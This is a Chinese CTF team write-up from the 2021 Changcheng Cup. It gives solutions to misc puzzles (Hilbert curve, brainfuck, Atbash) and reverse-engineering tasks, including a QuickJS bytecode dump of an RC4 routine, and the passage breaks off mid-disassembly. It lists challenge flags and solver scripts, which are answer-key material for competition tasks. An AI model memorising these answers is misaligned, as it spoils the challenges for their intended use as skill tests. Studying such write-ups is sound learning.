2021-09-19  /posts/11556/ 99+   35 分钟   5.3 k0次访问

2021第一届长城杯网络安全大赛WP

第一届“长城杯”网络安全大赛 - 院校组 - 不是睡就是吃 WP

成绩

Misc

签到

16进制的ascii+base64,手速是吧,直接一血。

flag{Welcome_to_changchengbe1}

你这flag保熟吗

前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现

(别问为什么模糊,问就是因为先在CSDN写的)

哦~,原来是希尔伯特曲线
观察和写脚本经历了长达1个多小时的斗争。
用希尔伯特曲线来提取此表格的脚本如下。(根据百度)

from hilbertcurve.hilbertcurve import HilbertCurve
import xlrd
readbook = xlrd.open_workbook('password.xls')
sheet = readbook.sheet_by_index(0)
f = open('base64.txt','w+')
hilbert_curve = HilbertCurve(17, 2)
base64 = ''
for i in range(65536):
    [j,k] = hilbert_curve.point_from_distance(i)
    base64 += sheet.cell(j,k).value
f.write(base64)

然后将base64,n次解码

(别问为什么有水印,问就是因为先写的CSDN)

密码为1f_y0u_h4ve_7he_fllllllag,_I_muSt_vvant_1t!
解压rar,得到flag.php
brainfuck,但是怎么弄都是输出error,障眼法是吧。
观察了之后发现前面所有的.(点)都被出题人删了,而作用是输出指针指向的单元内容,所以前面那一长串都无法输出,值只能被保留在对应单元中。
好在github搜brainfuck第一个就可以看到每个单元里面的信息,虽然写脚本也行,但是人都挺懒
https://fatiherikli.github.io/brainfuck-visualizer
用这个,勾选上Optimize?,delay调到最低
但是其实你还会发现一个问题,单元格只有20多个,额外的没法输出
这时只需要凭感觉将前面部分去掉,然后重新跑就行,找交集就能知道整个链子应该是哪样的了
得到
s = [117,111,122,116,123,83,114,82,121,118,105,103,95,88,102,105,101,118,95,49,72,95,52,95,101,101,48,109,119,118,105,117,102,33,95,120,102,105,101,118,125]
然后输出发现是uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}
然后atbash

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

re

Just_cmp-re

类原题的改编题
[Zer0pts2020]easy strcmp
自己跟着复现这道题就完事
脚本如下

enc = 'flag{********************************}'
m = [0x0A07370000000000, 0x380B06060A080A37, 0x3B0F0E38083B0A07,0x373B0709060B0A3A,0x0F38070F0D]
import binascii

flag = b""  # 由于是字节操作,需要在前面加上b
for i in range(5):
    p = enc[i * 8:(i + 1) * 8]  # 将enc字符串8位一组分开
    print(p)
    a = binascii.b2a_hex(p.encode('ascii')[::-1])  # 将分开后的字符串转每一位转换成ascii,然后逆序
    print(a)
    b = binascii.a2b_hex(hex(int(a, 16) + m[i])[2:])[::-1]  # (enc[i]的ascii+m[i])的结果是16进制,[2::]是舍弃开头的0x,然后[::-1]逆序
    print(b)
    print('\n')

    flag += b  # 拼凑每组还原后的结果

print(flag)

flag{a14a424005b14e2b89ed45031ea791b9}

Funny_js

该题WP来自战队成员,未参加本次比赛团队解题,放出WP供于学习 来自1u1u

考点:quickjs、bytecode 、rc4.

quickjs写的程序。

下载源码,注意版本要为 quickjs-2020-01-19.tar.xz

然后解压后要修改quickjs.c里面的源码,使得起输出字节码。

先编译一个.c程序

在example里面有样本js文件,进到该目录,

qjsc -e -o hello.c hello.js

得到hello.c文件

/* File generated automatically by the QuickJS compiler. */

#include "quickjs-libc.h"

const uint32_t qjsc_hello_size = 78;

const uint8_t qjsc_hello[78] = {
 0x02, 0x04, 0x0e, 0x63, 0x6f, 0x6e, 0x73, 0x6f,
 0x6c, 0x65, 0x06, 0x6c, 0x6f, 0x67, 0x16, 0x48,
 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f, 0x72,
 0x6c, 0x64, 0x10, 0x68, 0x65, 0x6c, 0x6c, 0x6f,
 0x2e, 0x6a, 0x73, 0x0e, 0x00, 0x06, 0x00, 0x9e,
 0x01, 0x00, 0x01, 0x00, 0x03, 0x00, 0x00, 0x14,
 0x01, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x39, 0xdf,
 0x00, 0x00, 0x00, 0x43, 0xe0, 0x00, 0x00, 0x00,
 0x04, 0xe1, 0x00, 0x00, 0x00, 0x24, 0x01, 0x00,
 0xcf, 0x28, 0xc4, 0x03, 0x01, 0x00,
};

int main(int argc, char **argv)
{
  JSRuntime *rt;
  JSContext *ctx;
  rt = JS_NewRuntime();
  ctx = JS_NewContextRaw(rt);
  JS_SetModuleLoaderFunc(rt, NULL, js_module_loader, NULL);
  JS_AddIntrinsicBaseObjects(ctx);
  JS_AddIntrinsicDate(ctx);
  JS_AddIntrinsicEval(ctx);
  JS_AddIntrinsicStringNormalize(ctx);
  JS_AddIntrinsicRegExp(ctx);
  JS_AddIntrinsicJSON(ctx);
  JS_AddIntrinsicProxy(ctx);
  JS_AddIntrinsicMapSet(ctx);
  JS_AddIntrinsicTypedArrays(ctx);
  JS_AddIntrinsicPromise(ctx);
  JS_AddIntrinsicBigInt(ctx);
  js_std_add_helpers(ctx, argc, argv);
  js_std_eval_binary(ctx, qjsc_hello, qjsc_hello_size, 0);
  js_std_loop(ctx);
  JS_FreeContext(ctx);
  JS_FreeRuntime(rt);
  return 0;
}

然后再我们的题目文件拷贝出qjsc_s数组,并计算数组大小。

修改上面的代码

最终

hello.c

#include "quickjs-libc.h"
 
const uint32_t qjsc_hello_size = 1164;
 
const uint8_t qjsc_hello[1164] = {
 0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02,
  0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02,
  0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63,
  0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31,
  0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61,
  0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A,
  0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
  0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
  0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
  0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F,
  0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A,
  0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72,
  0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61,
  0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78,
  0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75,
  0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61,
  0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75,
  0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01,
  0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00,
  0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0,
  0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00,
  0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00,
  0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5,
  0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00,
  0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00,
  0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1,
  0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00,
  0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1,
  0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00,
  0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00,
  0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6,
  0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00,
  0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00,
  0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA,
  0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E,
  0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00,
  0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4,
  0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0,
  0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1,
  0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF,
  0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9,
  0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00,
  0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C,
  0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00,
  0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF,
  0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21,
  0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00,
  0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11,
  0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A,
  0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6,
  0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00,
  0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB,
  0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00,
  0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00,
  0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00,
  0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9,
  0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00,
  0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A,
  0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00,
  0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00,
  0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00,
  0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00,
  0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93,
  0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6,
  0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB,
  0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00,
  0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1,
  0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5,
  0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB,
  0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC,
  0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB,
  0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00,
  0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06,
  0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC,
  0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00,
  0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00,
  0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1,
  0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00,
  0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11,
  0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE,
  0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF,
  0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A,
  0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B,
  0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A,
  0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06,
  0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB,
  0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00,
  0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00,
  0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00,
  0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00,
  0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00,
  0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01,
  0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC,
  0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7,
  0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C,
  0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00,
  0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0,
  0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8,
  0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95,
  0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00,
  0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC,
  0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01,
  0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E,
  0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01,
  0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72,
  0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A,
  0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00,
  0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00,
  0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01,
  0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE,
  0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30,
  0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40,
  0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00,
  0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5,
  0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8,
  0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE,
  0x0A, 0x28, 0x01,0xfe
};
 
int main(int argc, char **argv)
{
  JSRuntime *rt;
  JSContext *ctx;
  rt = JS_NewRuntime();
  ctx = JS_NewContextRaw(rt);
  JS_SetModuleLoaderFunc(rt, NULL, js_module_loader, NULL);
  JS_AddIntrinsicBaseObjects(ctx);
  JS_AddIntrinsicDate(ctx);
  JS_AddIntrinsicEval(ctx);
  JS_AddIntrinsicStringNormalize(ctx);
  JS_AddIntrinsicRegExp(ctx);
  JS_AddIntrinsicJSON(ctx);
  JS_AddIntrinsicProxy(ctx);
  JS_AddIntrinsicMapSet(ctx);
  JS_AddIntrinsicTypedArrays(ctx);
  JS_AddIntrinsicPromise(ctx);
  JS_AddIntrinsicBigInt(ctx);
  js_std_add_helpers(ctx, argc, argv);
  js_std_eval_binary(ctx, qjsc_hello, qjsc_hello_size, 0);
  js_std_loop(ctx);
  JS_FreeContext(ctx);
  JS_FreeRuntime(rt);
  return 0;
}

然后使用编译

gcc -ggdb hello.c libquickjs.a -lm -ldl -lpthread

得到一个a.out 文件

输出重定位一下

./a.out >1.txt

得到

1.txt

0000:  02 1b                    27 atom indexes {
0002:  06 72 63 34                string: 1"rc4"
0006:  04 73 6e                   string: 1"sn"
0009:  02 69                      string: 1"i"
000b:  02 6a                      string: 1"j"
000d:  02 6b                      string: 1"k"
000f:  02 6c                      string: 1"l"
0011:  02 6d                      string: 1"m"
0013:  02 6e                      string: 1"n"
0015:  04 75 6e                   string: 1"un"
0018:  06 61 72 72                string: 1"arr"
001c:  0c 63 69 70 68 65 72       string: 1"cipher"
0023:  2a 32 30 32 31 71 75 69
       63 6b 6a 73 5f 68 61 70
       70 79 67 61 6d 65          string: 1"2021quickjs_happygame"
0039:  48 2a 2a 2a 2a 2a 2a 2a
       2a 2a 2a 2a 2a 2a 2a 2a
       2a 2a 2a 2a 2a 2a 2a 2a
       2a 2a 2a 2a 2a 2a 2a 2a
       2a 2a 2a 2a 2a             string: 1"************************************"
005e:  02 73                      string: 1"s"
0060:  18 66 72 6f 6d 43 68 61
       72 43 6f 64 65             string: 1"fromCharCode"
006d:  0a 70 72 69 6e 74          string: 1"print"
0073:  12 73 6f 75 72 63 65 2e
       6a 73                      string: 1"source.js"
007d:  08 64 61 74 61             string: 1"data"
0082:  06 6b 65 79                string: 1"key"
0086:  06 62 6f 78                string: 1"box"
008a:  02 78                      string: 1"x"
008c:  08 74 65 6d 70             string: 1"temp"
0091:  02 79                      string: 1"y"
0093:  06 6f 75 74                string: 1"out"
0097:  08 63 6f 64 65             string: 1"code"
009c:  14 63 68 61 72 43 6f 64
       65 41 74                   string: 1"charCodeAt"
00a7:  08 70 75 73 68             string: 1"push"
                                }
00ac:  0e                       function {
00ad:  00 06 00 9e 01 00 01 00
       20 00 08 eb 04 01          name: "<eval>"
                                  args=0 vars=1 defargs=0 closures=0 cpool=8
                                  stack=32 bclen=619 locals=1
                                  vars {
00bb:  a0 01 00 00 00               name: "<ret>"
                                  }
                                  bytecode {
00c0:  40 df 00 00 00 40 40 e0
       00 00 00 00 40 e1 00 00
       00 00 40 e2 00 00 00 00
       40 e3 00 00 00 00 40 e4
       00 00 00 00 40 e5 00 00
       00 00 40 e6 00 00 00 00
       40 e7 00 00 00 00 40 e8
       00 00 00 00 40 e9 00 00
       00 00 40 e1 00 00 00 00
       c2 00 41 df 00 00 00 00
       3f e0 00 00 00 00 3f e1
       00 00 00 00 3f e2 00 00
       00 00 3f e3 00 00 00 00
       3f e4 00 00 00 00 3f e5
       00 00 00 00 3f e6 00 00
       00 00 3f e7 00 00 00 00
       3f e8 00 00 00 00 3f e9
       00 00 00 00 3f e1 00 00
       00 00 04 ea 00 00 00 11
       3a e7 00 00 00 0e 04 eb
       00 00 00 11 3a e0 00 00
       00 cb c0 96 00 c0 e0 00
       c0 f4 00 bf 44 bf 3d bf
       7d bf 08 c0 ef 00 c0 cb
       00 c0 fe 00 c0 f1 00 bf
       71 c0 d5 00 c0 b0 00 bf
       40 bf 6a bf 67 c0 a6 00
       c0 b9 00 c0 9f 00 c0 9e
       00 c0 ac 00 bf 09 c0 d5
       00 c0 ef 00 bf 0c bf 64
       c0 b9 00 bf 5a c0 ae 00
       bf 6b c0 83 00 26 20 00
       c0 df 00 4d 20 00 00 80
       bf 7a 4d 21 00 00 80 c0
       e5 00 4d 22 00 00 80 c0
       9d 00 4d 23 00 00 80 11
       3a e8 00 00 00 0e c1 01
       11 3a e5 00 00 00 cb c1
       02 11 3a e6 00 00 00 cb
       b7 11 3a e4 00 00 00 cb
       b7 11 3a e3 00 00 00 cb
       39 df 00 00 00 39 e0 00
       00 00 39 e7 00 00 00 f2
       11 3a e9 00 00 00 0e 06
       cb b7 11 3a e1 00 00 00
       0e 39 e1 00 00 00 39 e9
       00 00 00 eb a5 ec 6e 39
       e9 00 00 00 39 e1 00 00
       00 48 11 3a e2 00 00 00
       cb 39 e2 00 00 00 bf 38
       bf 11 a0 b0 11 3a e4 00
       00 00 cb 06 cb 39 e4 00
       00 00 39 e8 00 00 00 39
       e3 00 00 00 48 ab ec 0f
       39 e5 00 00 00 93 3a e5
       00 00 00 cb ee 0d 39 e6
       00 00 00 93 3a e6 00 00
       00 cb 39 e3 00 00 00 93
       3a e3 00 00 00 cb 39 e1
       00 00 00 93 3a e1 00 00
       00 0e ee 86 06 cb 39 e5
       00 00 00 39 e9 00 00 00
       eb ab ec 15 39 e6 00 00
       00 b7 ab ec 0c c1 03 11
       3a e6 00 00 00 cb ee 0a
       c1 04 11 3a e6 00 00 00
       cb c3 11 3a ec 00 00 00
       cb 06 cb 39 e6 00 00 00
       c1 05 a7 ec 3a 39 ec 00
       00 00 39 97 00 00 00 43
       ed 00 00 00 39 96 00 00
       00 39 e6 00 00 00 c1 06
       9e f1 24 01 00 9f 11 3a
       ec 00 00 00 cb 39 e6 00
       00 00 c1 07 9d 11 3a e6
       00 00 00 cb ee be 39 ee
       00 00 00 39 ec 00 00 00
       f1 cf 28                     at 1, fixup atom: rc4
                                    at 7, fixup atom: sn
                                    at 13, fixup atom: i
                                    at 19, fixup atom: j
                                    at 25, fixup atom: k
                                    at 31, fixup atom: l
                                    at 37, fixup atom: m
                                    at 43, fixup atom: n
                                    at 49, fixup atom: un
                                    at 55, fixup atom: arr
                                    at 61, fixup atom: cipher
                                    at 67, fixup atom: i
                                    at 75, fixup atom: rc4
                                    at 81, fixup atom: sn
                                    at 87, fixup atom: i
                                    at 93, fixup atom: j
                                    at 99, fixup atom: k
                                    at 105, fixup atom: l
                                    at 111, fixup atom: m
                                    at 117, fixup atom: n
                                    at 123, fixup atom: un
                                    at 129, fixup atom: arr
                                    at 135, fixup atom: cipher
                                    at 141, fixup atom: i
                                    at 147, fixup atom: "2021quickjs_happygame"
                                    at 153, fixup atom: un
                                    at 159, fixup atom: "************************************"
                                    at 165, fixup atom: sn
                                    at 260, fixup atom: "32"
                                    at 267, fixup atom: "33"
                                    at 275, fixup atom: "34"
                                    at 283, fixup atom: "35"
                                    at 289, fixup atom: arr
                                    at 298, fixup atom: m
                                    at 307, fixup atom: n
                                    at 315, fixup atom: l
                                    at 323, fixup atom: k
                                    at 329, fixup atom: rc4
                                    at 334, fixup atom: sn
                                    at 339, fixup atom: un
                                    at 346, fixup atom: cipher
                                    at 356, fixup atom: i
                                    at 362, fixup atom: i
                                    at 367, fixup atom: cipher
                                    at 376, fixup atom: cipher
                                    at 381, fixup atom: i
                                    at 388, fixup atom: j
                                    at 394, fixup atom: j
                                    at 406, fixup atom: l
                                    at 414, fixup atom: l
                                    at 419, fixup atom: arr
                                    at 424, fixup atom: k
                                    at 433, fixup atom: m
                                    at 439, fixup atom: m
                                    at 447, fixup atom: n
                                    at 453, fixup atom: n
                                    at 459, fixup atom: k
                                    at 465, fixup atom: k
                                    at 471, fixup atom: i
                                    at 477, fixup atom: i
                                    at 487, fixup atom: m
                                    at 492, fixup atom: cipher
                                    at 501, fixup atom: n
                                    at 513, fixup atom: n
                                    at 524, fixup atom: n
                                    at 532, fixup atom: s
                                    at 540, fixup atom: n
                                    at 550, fixup atom: s
                                    at 555, fixup atom: String
                                    at 560, fixup atom: fromCharCode
                                    at 565, fixup atom: Number
                                    at 570, fixup atom: n
                                    at 584, fixup atom: s
                                    at 590, fixup atom: n
                                    at 599, fixup atom: n
                                    at 607, fixup atom: print
                                    at 612, fixup atom: s
                                  }
                                  debug {
032b:  de 03 01 20 00 48 01 00
       4a 52 3f 40 00 7c 04 30
       30 2b 2b 77 7b 5d 5d 6c
       3f 0e 40 3f 4a b7 30 2b
       3f cb 4e 0d                  filename: "source.js"
                                  }
                                  cpool {
034f:  0e                           function {
0350:  43 06 00 be 03 02 08 02
       05 00 00 bb 01 0a              name: rc4
                                      args=2 vars=8 defargs=2 closures=0 cpool=0
                                      stack=5 bclen=187 locals=10
                                      vars {
035e:  e0 03 00 01 00                   name: data
0363:  e2 03 00 01 00                   name: key
0368:  e4 03 00 00 00                   name: box
036d:  c2 03 00 01 00                   name: i
0372:  e6 03 00 02 00                   name: x
0377:  e8 03 00 03 00                   name: temp
037c:  ea 03 00 04 00                   name: y
0381:  ec 03 00 05 00                   name: out
0386:  ee 03 00 06 00                   name: code
038b:  c6 03 00 07 00                   name: k
                                      }
                                      bytecode {
0390:  39 94 00 00 00 c0 00 01
       f1 cb b7 cc c8 c0 00 01
       a5 ec 09 c7 c8 c8 4a 95
       01 ee f2 b7 cd b7 cc c8
       c0 00 01 a5 ec 2c c9 c7
       c8 48 9f d4 43 f8 00 00
       00 c8 d4 eb 9e 24 01 00
       9f c0 00 01 9e cd c7 c8
       48 ce c7 c8 72 c7 c9 48
       4a c7 c9 ca 4a 95 01 ee
       cf b7 cd b7 c5 04 26 00
       00 c5 05 b7 cc c8 d3 eb
       a5 ec 56 d3 43 f8 00 00
       00 c8 24 01 00 c5 06 c9
       b8 9f c0 00 01 9e cd c4
       04 c7 c9 48 9f c0 00 01
       9e c5 04 c7 c9 48 ce c7
       c9 72 c7 c4 04 48 4a c7
       c4 04 ca 4a c7 c9 48 c7
       c4 04 48 9f c0 00 01 9e
       c5 07 c4 05 43 f9 00 00
       00 c4 06 c7 c4 07 48 b0
       24 01 00 0e 95 01 ee a6
       c4 05 28                         at 1, fixup atom: Array
                                        at 45, fixup atom: charCodeAt
                                        at 101, fixup atom: charCodeAt
                                        at 165, fixup atom: push
                                      }
                                      debug {
044b:  de 03 03 19 04 35 30 17
       18 0d 30 7b 17 26 17 19
       0d 12 1c 2c 40 2b 3f 17
       2b 1d 4a 5d 17                   filename: "source.js"
                                      }
                                    }
source.js:3: function: rc4
  args: data key
  locals:
    0: var box
    1: var i
    2: var x
    3: var temp
    4: var y
    5: var out
    6: var code
    7: var k
  stack_size: 5
  opcodes:
        get_var Array
        push_i16 256
        call1 1
        put_loc0 0: box
        push_0 0
        put_loc1 1: i
   12:  get_loc1 1: i
        push_i16 256
        lt
        if_false8 27
        get_loc0 0: box
        get_loc1 1: i
        get_loc1 1: i
        put_array_el
        inc_loc 1: i
        goto8 12
   27:  push_0 0
        put_loc2 2: x
        push_0 0
        put_loc1 1: i
   31:  get_loc1 1: i
        push_i16 256
        lt
        if_false8 81
        get_loc2 2: x
        get_loc0 0: box
        get_loc1 1: i
        get_array_el
        add
        get_arg1 1: key
        get_field2 charCodeAt
        get_loc1 1: i
        get_arg1 1: key
        get_length
        mod
        call_method 1
        add
        push_i16 256
        mod
        put_loc2 2: x
        get_loc0 0: box
        get_loc1 1: i
        get_array_el
        put_loc3 3: temp
        get_loc0 0: box
        get_loc1 1: i
        to_propkey2
        get_loc0 0: box
        get_loc2 2: x
        get_array_el
        put_array_el
        get_loc0 0: box
        get_loc2 2: x
